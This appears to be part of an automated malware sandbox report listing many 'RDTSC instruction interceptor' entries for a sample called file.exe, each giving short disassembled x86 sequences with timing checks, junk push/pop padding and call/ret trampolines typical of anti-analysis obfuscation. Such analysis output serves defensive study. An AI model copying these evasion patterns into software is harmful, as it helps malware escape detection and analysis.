Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B034D second address: 7B03C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF0EC6B64C8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 sub esi, dword ptr [ebp+122D3D5Ah] 0x0000002c mov edi, dword ptr [ebp+122D3B82h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007FF0EC6B64C8h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e mov edi, 0ADCB494h 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 jg 00007FF0EC6B64C8h 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B03C9 second address: 7B03CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B03CD second address: 7B03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B03D1 second address: 7B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC517C88h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0E4E second address: 7B0EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF0EC6B64C6h 0x00000009 jg 00007FF0EC6B64C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 mov esi, dword ptr [ebp+122D378Dh] 0x00000019 push 00000000h 0x0000001b add esi, 4BC81A00h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FF0EC6B64C8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov di, D61Fh 0x00000041 mov edi, dword ptr [ebp+122D3BDAh] 0x00000047 xchg eax, ebx 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FF0EC6B64CBh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0EAD second address: 7B0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF0EC517C82h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0BCA second address: 7B0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0EC8 second address: 7B0ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0BD7 second address: 7B0BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0ECE second address: 7B0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B0ED2 second address: 7B0ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5965 second address: 7B597C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B597C second address: 7B59F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FF0EC6B64C8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF0EC6B64C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e ja 00007FF0EC6B64CCh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FF0EC6B64C8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 push 00000000h 0x00000052 mov ebx, dword ptr [ebp+122D1FFBh] 0x00000058 mov ebx, edi 0x0000005a push eax 0x0000005b pushad 0x0000005c jno 00007FF0EC6B64C8h 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B59F7 second address: 7B59FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B20E5 second address: 7B20E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B20E9 second address: 7B20ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B20ED second address: 7B2115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007FF0EC6B64E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0EC6B64D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A1C second address: 7B6A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A22 second address: 7B6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8866 second address: 7B88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FF0EC517C83h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF0EC517C78h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d and edi, dword ptr [ebp+122D1F5Ch] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FF0EC517C78h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f stc 0x00000050 movzx ebx, bx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007FF0EC517C7Ch 0x0000005c jnp 00007FF0EC517C76h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BB6 second address: 7B7BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9832 second address: 7B9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A82 second address: 7B8A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9837 second address: 7B983C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A86 second address: 7B8A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B983C second address: 7B9852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jp 00007FF0EC517C78h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A8A second address: 7B8A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A90 second address: 7B8A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA739 second address: 7BA73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA73D second address: 7BA7A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D32AEh], edi 0x00000011 push 00000000h 0x00000013 cmc 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FF0EC517C78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push edx 0x00000031 add dword ptr [ebp+122D1D83h], edi 0x00000037 pop ebx 0x00000038 mov edi, dword ptr [ebp+122D3C72h] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 jmp 00007FF0EC517C7Ch 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA7A2 second address: 7BA7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB82B second address: 7BB830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB9C3 second address: 7BB9CD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB9CD second address: 7BBA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 movsx ebx, si 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov ebx, eax 0x0000001d mov eax, dword ptr [ebp+122D16CDh] 0x00000023 ja 00007FF0EC517C79h 0x00000029 push FFFFFFFFh 0x0000002b call 00007FF0EC517C83h 0x00000030 mov dword ptr [ebp+122D212Bh], eax 0x00000036 pop ebx 0x00000037 pushad 0x00000038 jnc 00007FF0EC517C7Ch 0x0000003e mov dword ptr [ebp+122D30FFh], ecx 0x00000044 popad 0x00000045 nop 0x00000046 jmp 00007FF0EC517C7Ch 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007FF0EC517C88h 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BE90F second address: 7BE913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BE913 second address: 7BE919 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C07AD second address: 7C07B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1738 second address: 7C179E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1246077Dh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FF0EC517C78h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FF0EC517C87h 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460796h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C179E second address: 7C17A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C17A3 second address: 7C17AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF0EC517C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C17AE second address: 7C17C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007FF0EC6B64CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BF9C9 second address: 7BF9CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0958 second address: 7C095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C19D3 second address: 7C19D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C459B second address: 7C459F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C459F second address: 7C45A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2771 second address: 7C2775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2775 second address: 7C277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4C9F second address: 7C4CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4CA5 second address: 7C4CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4CAB second address: 7C4CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5D4C second address: 7C5D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5D55 second address: 7C5D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4ED1 second address: 7C4ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4ED6 second address: 7C4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5E18 second address: 7C5E31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FF0EC517C76h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0EC517C7Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE750 second address: 7CE756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE756 second address: 7CE762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE1F3 second address: 7CE20D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C96 second address: 7D1CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f jmp 00007FF0EC517C85h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jp 00007FF0EC517C8Eh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 pushad 0x00000023 jno 00007FF0EC517C76h 0x00000029 jnp 00007FF0EC517C76h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1E11 second address: 7D1E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1E17 second address: 7D1E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1E25 second address: 7D1E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F0C second address: 7D1F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F10 second address: 7D1F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F16 second address: 7D1F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0EC517C87h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FF0EC517C88h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF0EC517C87h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F80 second address: 7D1F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F84 second address: 7D1F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F8D second address: 7D1FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF0EC6B64C8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3296 second address: 7D32B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC517C76h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FF0EC517C7Fh 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D32B6 second address: 7D32D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF0EC6B64D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 770EBB second address: 770EEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FF0EC517C76h 0x0000000d jmp 00007FF0EC517C7Ah 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF0EC517C88h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8EE2 second address: 7D8F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FF0EC6B64CFh 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FF0EC6B64C6h 0x00000015 popad 0x00000016 jmp 00007FF0EC6B64CBh 0x0000001b pushad 0x0000001c jc 00007FF0EC6B64C6h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D94BE second address: 7D94C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D94C2 second address: 7D94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9648 second address: 7D964C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D964C second address: 7D967D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF0EC6B64C6h 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D967D second address: 7D9685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9967 second address: 7D996B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D996B second address: 7D9977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9ADF second address: 7D9B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 jmp 00007FF0EC6B64D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FF0EC6B64C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9B1A second address: 7D9B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
